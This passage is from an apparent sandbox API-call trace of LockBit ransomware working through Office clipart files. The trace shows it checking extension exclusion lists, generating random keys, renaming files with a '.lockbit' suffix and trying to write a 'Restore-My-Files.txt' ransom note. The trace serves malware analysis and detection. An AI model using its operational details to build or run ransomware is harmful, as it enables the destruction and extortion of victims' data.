returned 1 [0167.636] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.636] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.637] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.637] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF.lockbit") returned 72 [0167.637] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02522_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.638] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.638] malloc (_Size=0x40068) returned 0x3df0008 [0167.638] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14840) returned 1 [0167.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.640] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.646] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.647] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.647] free (_Block=0x1fa2ed8) [0167.647] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02522_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.647] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.647] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.647] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02950_.WMF", cAlternateFileName="")) returned 1 [0167.647] lstrcmpiW (lpString1=".", lpString2="PE02950_.WMF") returned -1 [0167.647] lstrcmpiW (lpString1="..", lpString2="PE02950_.WMF") returned -1 [0167.647] PathFindExtensionW (pszPath="PE02950_.WMF") returned=".WMF" [0167.647] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.647] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.647] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.647] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.647] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.647] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.648] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.648] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02950_.WMF") returned 1 [0167.649] lstrcmpiW (lpString1="ntldr", lpString2="PE02950_.WMF") returned -1 [0167.649] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02950_.WMF") returned -1 [0167.649] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02950_.WMF") returned -1 [0167.649] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02950_.WMF") returned -1 [0167.649] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02950_.WMF") returned 1 [0167.649] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02950_.WMF") returned -1 [0167.649] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.649] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF") returned=".WMF" [0167.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.649] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.649] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.650] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.650] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF.lockbit") returned 72 [0167.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02950_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.652] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.652] malloc (_Size=0x40068) returned 0x3df0008 [0167.652] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7466) returned 1 [0167.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.653] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.659] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.659] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.659] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.661] free (_Block=0x1fa2ed8) [0167.661] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02950_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.661] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.661] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.661] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6cdb1210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02957_.WMF", cAlternateFileName="")) returned 1 [0167.661] lstrcmpiW (lpString1=".", lpString2="PE02957_.WMF") returned -1 [0167.661] lstrcmpiW (lpString1="..", lpString2="PE02957_.WMF") returned -1 [0167.661] PathFindExtensionW (pszPath="PE02957_.WMF") returned=".WMF" [0167.661] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.661] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.661] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.661] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.662] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.663] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.663] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02957_.WMF") returned 1 [0167.664] lstrcmpiW (lpString1="ntldr", lpString2="PE02957_.WMF") returned -1 [0167.664] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02957_.WMF") returned -1 [0167.664] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02957_.WMF") returned -1 [0167.664] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02957_.WMF") returned -1 [0167.664] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02957_.WMF") returned 1 [0167.664] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02957_.WMF") returned -1 [0167.664] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.664] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF") returned=".WMF" [0167.664] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.664] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.664] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.665] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.665] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF.lockbit") returned 72 [0167.665] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02957_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.666] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.666] malloc (_Size=0x40068) returned 0x3df0008 [0167.666] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3184) returned 1 [0167.666] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.668] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.673] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.673] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.673] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0167.673] free (_Block=0x1fa2ed8) [0167.673] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02957_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.673] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.674] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.674] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b17c400, ftCreationTime.dwHighDateTime=0x1bd4af8, ftLastAccessTime.dwLowDateTime=0x59cdb0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b17c400, ftLastWriteTime.dwHighDateTime=0x1bd4af8, nFileSizeHigh=0x0, nFileSizeLow=0x614, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE03236_.WMF", cAlternateFileName="")) returned 1 [0167.674] lstrcmpiW (lpString1=".", lpString2="PE03236_.WMF") returned -1 [0167.674] lstrcmpiW (lpString1="..", lpString2="PE03236_.WMF") returned -1 [0167.674] PathFindExtensionW (pszPath="PE03236_.WMF") returned=".WMF" [0167.674] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.674] lstrcmpiW (lpString1=".msi", lpString2=".WMF") 